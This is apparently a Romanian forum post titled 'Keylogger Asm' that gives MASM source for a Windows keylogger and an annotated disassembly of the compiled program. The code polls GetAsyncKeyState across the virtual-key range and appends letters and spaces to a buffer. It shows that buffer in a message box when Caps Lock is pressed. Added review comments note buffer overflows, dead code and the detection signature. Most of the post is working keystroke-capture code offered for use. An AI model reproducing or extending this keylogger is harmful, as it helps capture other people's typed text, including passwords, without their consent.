Keylogger Asm

This article was written more than 24 months ago; the information might be outdated.

Am rescris metoda cu GetAsyncKeyState in masm , ma rog e mai necizelata dar merge :
Cod:


.Const

.Data?

sh DD ?                 ; last GetAsyncKeyState(14H) result (Caps Lock), letter branch only
cp DD ?                 ; last GetAsyncKeyState(10H) result (Shift), letter branch only
Number DD ?             ; declared but never referenced below

index DD ?              ; virtual-key code currently being polled, 8..190 (08H..0BEH)
tindex DD ?             ; character value handed to wsprintf: index as-is, or index+32 for lowercase
TempC DB ?              ; NOTE(review): 1 byte declared, but wsprintf "%lc" writes the character plus a NUL, so the second byte lands past TempC's storage

.Data

WprType DB "%lc", 0     ; wsprintf format: a single character, passed as a DWORD
Keys DB 512 Dup(0)      ; accumulated keystroke text; lstrcat appends with no check against the 512-byte size

.Code
; Structure (single thread, no PROCs):
;   rr:       Sleep 60 ms, then sweep virtual-key codes 8..190 one at a time
;   ForLoop:  one polling step per code; a key counts only when GetAsyncKeyState returns
;             8001H (bit 15 = currently down, bit 0 = pressed since the previous call)
; Apart from the Space path, only codes 60..90 (3CH..5AH; 41H..5AH are VK_A..VK_Z, 3CH..40H
; are not assigned virtual keys) are ever appended to Keys.
; Holding Caps Lock (14H) at the top of the loop shows Keys in a MessageBox and exits.
; Detection note: a Sleep/GetAsyncKeyState polling loop over the whole VK range, with the
; buffer grown by lstrcat, is the classic user-mode polling keylogger pattern.
start:
Mov Keys, 0             ; Keys[0] = 0: start with an empty string
rr:
Invoke Sleep, 60        ; 60 ms between full sweeps of the key range
Mov index, 0            ; dead store, overwritten on the next line
Mov index, 8            ; sweep starts at code 08H (VK_BACK)
ForLoop:
; exit trigger: Caps Lock down (or pressed since the last call) -> show buffer and quit
Invoke GetAsyncKeyState, 14H
.If Eax
Invoke MessageBox, 0, Addr Keys, 0, 0   ; caption NULL, no buttons specified
Invoke ExitProcess, NULL
.EndIf
; poll the key currently selected by index
Invoke GetAsyncKeyState, index
.If Eax == -32767 ; 8001H: down AND pressed since last call; assumes the SHORT result is sign-extended into EAX (the disassembly compares the full register against 0FFFF8001h)
Invoke GetAsyncKeyState, 20H           ; 20H = VK_SPACE
.If Eax
Invoke wsprintf, Addr TempC, Addr WprType, 20H ; a space is enough ... (records ' ' instead of the key at index whenever Space is down)
Invoke lstrcat, Addr Keys, Addr TempC
.ElseIf (index >= 60) && (index < = 90)   ; 3CH..5AH; NOTE(review): "< =" as printed is likely a rendering artifact of <= (the disassembly shows cmp ..,05ah / ja)
Mov sh, 0
Mov cp, 0
Invoke GetAsyncKeyState, 14H ; Caps Lock again: the check at the top of ForLoop already exits when it is down, so this is nonzero only if it was pressed between the two calls
Mov sh, Eax
Invoke GetAsyncKeyState, 10H ; 10H = VK_SHIFT
Mov cp, Eax
.If cp != 0 || sh != 0 ; Shift or Caps Lock active: record the code as-is (41H..5AH == 'A'..'Z')
Xor Eax, Eax
Mov tindex, Eax        ; redundant zeroing; tindex is overwritten two lines down
Mov Eax, index
Mov tindex, Eax
Invoke wsprintf, Addr TempC, Addr WprType, tindex
Invoke lstrcat, Addr Keys, Addr TempC
.Else
Xor Eax, Eax
Mov tindex, Eax        ; redundant zeroing, as above
Mov Eax, index
Mov tindex, Eax
Add tindex, 32         ; +20H maps 'A'..'Z' to 'a'..'z'
Invoke wsprintf, Addr TempC, Addr WprType, tindex
Invoke lstrcat, Addr Keys, Addr TempC
.EndIf

.If index == 190       ; 0BEH is the last code swept: restart after another Sleep
Jmp rr
.Else
Inc index
Jmp ForLoop
.EndIf

.EndIf
.EndIf

.If index == 190       ; same restart/advance logic for keys that were not recorded (duplicate of the block above)
Jmp rr
.Else
Inc index
Jmp ForLoop
.EndIf

Invoke ExitProcess, NULL   ; unreachable: both branches above jump away
End start

In „raw asm” ar arata cam asa:

;<= Procedure Start (disassembler annotation). This is the MASM program above as built; the
; @Project1_ labels are code addresses. The Win32 imports go through stdcall thunks (_name@N);
; wsprintfA is cdecl, hence the add esp,0ch after each call to it.

        mov byte ptr [keys],0                ; start: Keys[0] = 0 (empty string)

@Project1_00401007:                          ; rr: sleep, then restart the sweep at VK code 8

        push 03ch                            ; 60 ms
        call _sleep@4                        ; JMP to kernel32.Sleep
        mov dword ptr [index],0              ; dead store
        mov dword ptr [index],8

@Project1_00401022:                          ; ForLoop: one polling step per VK code

        push 014h                            ; VK_CAPITAL
        call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
        or eax,eax
        je @Project1_00401044                ; Caps Lock neither down nor pressed since last call -> poll the current key
        push 0
        push 0
        push offset keys                     ; show the collected buffer, then terminate
        push 0
        call _messageboxa@16                 ; JMP to user32.MessageBoxA
        push 0
        call _exitprocess@4                  ; JMP to kernel32.ExitProcess

@Project1_00401044:

        push dword ptr [index]
        call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
        cmp eax,0ffff8001h                   ; -32767: bit 15 (down) and bit 0 (pressed since last call); full-register compare
        jnz @Project1_0040117c               ; not a fresh press -> advance index
        push 020h                            ; VK_SPACE
        call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
        or eax,eax
        je @Project1_0040108d                ; Space not down -> letter branch
        push 020h                            ; character ' '
        push offset wprtype                  ; ASCII "%lc"
        push offset tempc
        call _wsprintfa                      ; JMP to user32.wsprintfA
        add esp,0ch                          ; cdecl: caller pops the 3 arguments
        push offset tempc
        push offset keys
        call _lstrcata@8                     ; JMP to kernel32.lstrcatA
        jmp @Project1_0040117c

@Project1_0040108d:                          ; .ElseIf (index >= 60) && (index <= 90)

        cmp dword ptr [index],03ch
        jb @Project1_0040117c                ; unsigned range check: below 3Ch or above 5Ah -> not recorded
        cmp dword ptr [index],05ah
        ja @Project1_0040117c
        mov dword ptr [sh],0
        mov dword ptr [cp],0
        push 014h                            ; VK_CAPITAL
        call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
        mov [sh],eax
        push 010h                            ; VK_SHIFT
        call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
        mov [cp],eax
        cmp dword ptr [cp],0
        jnz @Project1_004010e5               ; Shift active -> uppercase path
        cmp dword ptr [sh],0
        je @Project1_0040111f                ; neither -> lowercase path

@Project1_004010e5:                          ; uppercase: append the VK code itself ('A'..'Z')

        xor eax,eax
        mov [tindex],eax                     ; redundant zeroing, overwritten below
        mov eax,[index]
        mov [tindex],eax
        push dword ptr [tindex]
        push offset wprtype                  ; ASCII "%lc"
        push offset tempc
        call _wsprintfa                      ; JMP to user32.wsprintfA
        add esp,0ch
        push offset tempc
        push offset keys
        call _lstrcata@8                     ; JMP to kernel32.lstrcatA
        jmp @Project1_0040115e

@Project1_0040111f:                          ; lowercase: append VK code + 20h

        xor eax,eax
        mov [tindex],eax                     ; redundant zeroing, overwritten below
        mov eax,[index]
        mov [tindex],eax
        add dword ptr [tindex],020h          ; 'A'..'Z' -> 'a'..'z'
        push dword ptr [tindex]
        push offset wprtype                  ; ASCII "%lc"
        push offset tempc
        call _wsprintfa                      ; JMP to user32.wsprintfA
        add esp,0ch
        push offset tempc
        push offset keys
        call _lstrcata@8                     ; JMP to kernel32.lstrcatA

@Project1_0040115e:                          ; inner "index == 190 ? restart : next key"

        cmp dword ptr [index],0beh           ; 0BEh = 190, last code in the sweep
        jnz @Project1_00401171
        jmp @Project1_00401007               ; back to rr
        jmp @Project1_0040117c               ; unreachable: follows an unconditional jmp

@Project1_00401171:

        inc dword ptr [index]
        jmp @Project1_00401022               ; next key

@Project1_0040117c:                          ; outer "index == 190 ? restart : next key" (duplicate of the block above)

        cmp dword ptr [index],0beh
        jnz @Project1_0040118f
        jmp @Project1_00401007               ;<= Procedure End ; back to rr

        jmp @Project1_0040119a               ; unreachable: follows an unconditional jmp

@Project1_0040118f:                          ;<= Procedure Start

        inc dword ptr [index]
        jmp @Project1_00401022               ;<= Procedure End ; next key

@Project1_0040119a:                          ;<= Procedure Start ; the final Invoke ExitProcess, never reached

        push 0
        call _exitprocess@4                  ;<= Procedure End ; JMP to kernel32.ExitProcess

        int3                                 ; presumably padding before the import thunks
        jmp [<&kernel32.exitprocess>]        ; kernel32.ExitProcess ; thunk for _ExitProcess@4 (its label is not printed in this listing)

_Sleep@4:

        jmp [< &kernel32.sleep>]              ; kernel32.Sleep ; the "< &" spacing here and below is a rendering artifact of the <&module.func> import syntax

_lstrcatA@8:

        jmp [< &kernel32.lstrcata>]           ; kernel32.lstrcatA

_wsprintfA:

        jmp [< &user32.wsprintfa>]            ; user32.wsprintfA (cdecl, no @N suffix)

_GetAsyncKeyState@4:

        jmp [< &user32.getasynckeystate>]     ; user32.GetAsyncKeyState

_MessageBoxA@16:

        jmp [< &user32.messageboxa>]          ; user32.MessageBoxA

Spatiu alocat pentru memorie e 3821 k maxim.
